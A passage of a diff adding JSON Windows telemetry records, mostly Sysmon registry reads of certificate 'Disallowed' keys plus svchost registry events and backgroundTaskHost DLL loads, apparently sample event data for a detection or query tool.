"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_value": "{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\BrokerId", + "registry_value": "BrokerId", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventParameters", + "registry_value": "EventParameters", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\PackageFullName", + "registry_value": "PackageFullName", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\UserSid", + "registry_value": "UserSid", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.ApplicationData.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_value": "{894f95b7-467e-4aba-b832-df7be656ba28}", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\BrokerId", + "registry_value": "BrokerId", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventParameters", + "registry_value": "EventParameters", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\PackageFullName", + "registry_value": "PackageFullName", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\UserSid", + "registry_value": "UserSid", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + 